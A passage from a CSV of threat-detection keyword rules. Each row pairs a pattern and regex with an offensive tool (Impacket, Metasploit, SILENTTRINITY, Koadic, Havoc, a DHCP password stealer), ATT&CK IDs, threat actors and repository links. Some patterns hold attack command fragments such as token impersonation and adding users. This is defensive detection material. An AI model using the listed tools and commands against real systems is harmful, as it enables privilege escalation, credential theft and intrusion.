providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48313" "*impacket-smbclient*",".{0,1000}impacket\-smbclient.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48314" "*impacket-smbserver*",".{0,1000}impacket\-smbserver.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48315" "*impacket-ticketer*",".{0,1000}impacket\-ticketer.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48316" "*impacketutils*",".{0,1000}impacketutils.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48317" "*impacket-wmiexec*",".{0,1000}impacket\-wmiexec.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Command execution with WMI From Linux","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48318" "*impacket-wmiexec*",".{0,1000}impacket\-wmiexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. 
The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","N/A","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48319" "*ImpactDecoder*",".{0,1000}ImpactDecoder.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48320" "*ImpactPacket*",".{0,1000}ImpactPacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48321" "*Impersonate NT AUTHORITY\\SYSTEM to hijack session*",".{0,1000}Impersonate\sNT\sAUTHORITY\\\\SYSTEM\sto\shijack\ssession.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","48322" "*Impersonate.exe adduser *",".{0,1000}Impersonate\.exe\sadduser\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","48323" "*Impersonate.exe exec *",".{0,1000}Impersonate\.exe\sexec\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral 
Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","48324" "*Impersonate.exe list *",".{0,1000}Impersonate\.exe\slist\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","48325" "*Impersonate.exe list*",".{0,1000}Impersonate\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","48326" "*impersonate_token *Administrator*",".{0,1000}impersonate_token\s.{0,1000}Administrator.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","Incognito","10","10","N/A","N/A","N/A","N/A","48327" "*impersonate_token *BUILTIN\Administrators*",".{0,1000}impersonate_token\s.{0,1000}BUILTIN\\Administrators.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48328" "*ImpersonateAndUnload.cpp*",".{0,1000}ImpersonateAndUnload\.cpp.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","48329" "*ImpersonateFromParentPid -ppid*",".{0,1000}ImpersonateFromParentPid\s\-ppid.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","48330" "*ImpersonateLocalService*",".{0,1000}ImpersonateLocalService.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","48331" "*ImpersonateLoggedOnUser worked, but thread is not running as SYSTEM*",".{0,1000}ImpersonateLoggedOnUser\sworked,\sbut\sthread\sis\snot\srunning\sas\sSYSTEM.{0,1000}","offensive_tool_keyword","Certify","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","48332" 
"*ImpersonateLoggedOnUser worked, but thread is not running as SYSTEM*",".{0,1000}ImpersonateLoggedOnUser\sworked,\sbut\sthread\sis\snot\srunning\sas\sSYSTEM.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","48333" "*impersonate-main.zip*",".{0,1000}impersonate\-main\.zip.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","48334" "*impersonateprocess.py*",".{0,1000}impersonateprocess\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","48335" "*impersonateuser.boo*",".{0,1000}impersonateuser\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","48336" "*impersonateuser.py*",".{0,1000}impersonateuser\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","48337" "*Impersonation #1 done.*",".{0,1000}Impersonation\s\#1\sdone\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","N/A","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","48338" "*Impersonation #1 failed. 
Exiting*",".{0,1000}Impersonation\s\#1\sfailed\.\sExiting.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","N/A","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","48339" "*Impersonation #2 done.*",".{0,1000}Impersonation\s\#2\sdone\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","N/A","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","48340" "*Impersonation #2 failed. Exiting*",".{0,1000}Impersonation\s\#2\sfailed\.\sExiting.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","N/A","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","48341" "*imperva_gzip.py*",".{0,1000}imperva_gzip\.py.{0,1000}","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","network exploitation tool","N/A","2","157","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z","48342" "*Implant*TeamServer.exe*",".{0,1000}Implant.{0,1000}TeamServer\.exe.{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. 
usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","N/A","10","10","27","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z","48343" "*Implant.ImplantGenerator*",".{0,1000}Implant\.ImplantGenerator.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","48344" "*implant.sleep-obf*",".{0,1000}implant\.sleep\-obf.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48345" "*implant/elevate/*",".{0,1000}implant\/elevate\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48346" "*implant/gather/*",".{0,1000}implant\/gather\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48347" "*implant/inject/*",".{0,1000}implant\/inject\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48348" "*implant/persist/*",".{0,1000}implant\/persist\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48349" "*implant/pivot/*",".{0,1000}implant\/pivot\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
